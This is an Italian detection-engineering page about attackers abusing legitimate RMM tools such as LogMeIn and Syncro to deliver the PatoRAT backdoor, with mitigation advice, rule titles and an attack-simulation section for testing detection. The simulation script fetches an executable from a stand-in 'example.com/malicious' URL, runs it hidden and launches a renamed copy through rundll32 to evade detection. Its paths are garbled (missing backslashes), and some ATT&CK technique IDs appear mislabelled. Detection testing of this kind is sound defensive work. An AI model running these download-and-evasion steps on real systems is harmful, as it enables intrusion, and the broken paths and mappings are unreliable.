Rilevamento Endpoint dei Casi Recenti di Distribuzione RMM
Detection stack
- AIDR
- Alert
- ETL
- Query
Riepilogo
Gli attori delle minacce stanno abusando sempre più degli strumenti legittimi di monitoraggio e gestione remota (RMM)—come LogMeIn, PDQ Connect, Syncro, ScreenConnect, NinjaOne e SuperOps—per distribuire malware e stabilire un accesso remoto persistente. La consegna iniziale avviene spesso tramite pagine di download malevole o email di phishing, seguita dall’esecuzione tramite PowerShell e dal dispiegamento di payload secondari come il backdoor PatoRAT. AhnLab EDR può rilevare l’esecuzione di queste utility RMM e generare avvisi basati sul comportamento riguardo alle attività sospette successive. Il rapporto sottolinea l’importanza di convalidare la provenienza del software e mantenere un monitoraggio continuo degli endpoint.
Indagine
AhnLab Security Intelligence Center ha osservato molteplici campagne in cui gli attaccanti hanno riconfezionato o mascherato gli installer RMM come applicazioni popolari (ad esempio, Notepad++, 7-Zip e Telegram) e li hanno distribuiti tramite siti web malevoli o allegati di phishing. Dopo l’installazione, gli agenti RMM si sono registrati alla loro infrastruttura fornitrice e sono stati poi utilizzati per eseguire payload PowerShell che hanno rilasciato PatoRAT. Attacchi simili sono apparsi su diversi prodotti RMM, incluso Syncro distribuito attraverso phishing con esche PDF. È stata sviluppata una logica di rilevamento AhnLab EDR per segnalare l’esecuzione di questi binari altrimenti legittimi e correlarla con i comportamenti post-installazione.
Mitigazione
Verifica le fonti di download, valida i certificati di firma del codice e confronta gli hash con le versioni del fornitore ufficiali prima di consentire il software RMM nell’ambiente. Enforce elenchi di permessi per le applicazioni e richiedi approvazioni esplicite per l’esecuzione RMM. Monitora l’avvio inatteso di binari RMM, l’attività anomala di PowerShell e le connessioni sospette ai domini dell’infrastruttura del fornitore quando tali strumenti non sono autorizzati. Mantieni i sistemi operativi e gli strumenti di sicurezza aggiornati per ridurre l’esposizione.
Risposta
Quando viene rilevata un’esecuzione RMM sospetta, isola l’host, raccogli artefatti forensi e rimuovi il binario non autorizzato. Blocca le connessioni in uscita alla infrastruttura dello strumento per interrompere i canali di controllo remoto, e esegui una scansione completa per payload secondari come PatoRAT. Aggiorna i contenuti di rilevamento con gli IOC osservati e informa il SOC sui modelli di campagna per un triage più rapido.
Flusso dell’attacco
Rilevamenti
Software di Accesso/Management Remoto Alternativo (via process_creation)
Visualizza
Tentativo di Installazione di Software RMM SuperOps Possibile (via file_event)
Visualizza
Software di Accesso/Management Remoto Alternativo (via audit)
Visualizza
Software di Accesso/Management Remoto Alternativo (via sistema)
Visualizza
Rilevamento dello Sfruttamento dello Strumento RMM per la Distribuzione di Malware [Creazione Processo Windows]
Visualizza
Esecuzione di Simulazione
Prerequisito: Il controllo pre-volo di Telemetria e Baseline deve essere superato.
Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirare a generare la telemetria esatta attesa dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.
-
Narrazione dell’Attacco e Comandi:
Un attaccante invia un’email di phishing contenente un allegato malevolo. L’allegato esegue uno script PowerShell che scarica il binario RMMLogMeIn.exetoC:Temp. Per eludere il rilevamento basato sul nome, l’attaccante rinomina il binario atool.exee lo avvia tramiterundll32.exe(T1216). Il binario RMM poi contatta il server C2 controllato dall’attaccante e lascia un payload backdoor. Dopo l’esecuzione, l’attaccante elimina il binario (T1542.004) per coprire le tracce. -
Script di Test di Regressione:
# --------------------------------------------------------------- # Simula lo sfruttamento dello strumento RMM (nome originale) – dovrebbe attivare # --------------------------------------------------------------- $rmmPath = "C:TempLogMeIn.exe" Invoke-WebRequest -Uri "https://example.com/malicious/LogMeIn.exe" -OutFile $rmmPath Write-Host "[*] Esecuzione del binario RMM originale (ci si aspetta un avviso)..." Start-Process -FilePath $rmmPath -WindowStyle Hidden Start-Sleep -Seconds 10 # --------------------------------------------------------------- # Simula evasione rinominando ed eseguendo via proxy – NON dovrebbe attivare # --------------------------------------------------------------- $evasionPath = "C:Temptool.exe" Rename-Item -Path $rmmPath -NewName "tool.exe" Write-Host "[*] Esecuzione del binario RMM rinominato tramite rundll32 (evasione)..." $rundll = "$env:SystemRootSystem32rundll32.exe" Start-Process -FilePath $rundll -ArgumentList "`"$evasionPath`",#1" -WindowStyle Hidden Start-Sleep -Seconds 10 # --------------------------------------------------------------- # Pulisci gli artefatti # --------------------------------------------------------------- Write-Host "[*] Pulizia dei binari..." Remove-Item -Path $evasionPath -Force -ErrorAction SilentlyContinue Write-Host "[*] Simulazione completata." -
Comandi di Pulizia:
# Assicurarsi che i processi rimanenti siano terminati Get-Process -Name "LogMeIn","tool" -ErrorAction SilentlyContinue | Stop-Process -Force # Rimuovere eventuali file scaricati (se ancora esistenti) Remove-Item -Path "C:TempLogMeIn.exe","C:Temptool.exe" -Force -ErrorAction SilentlyContinue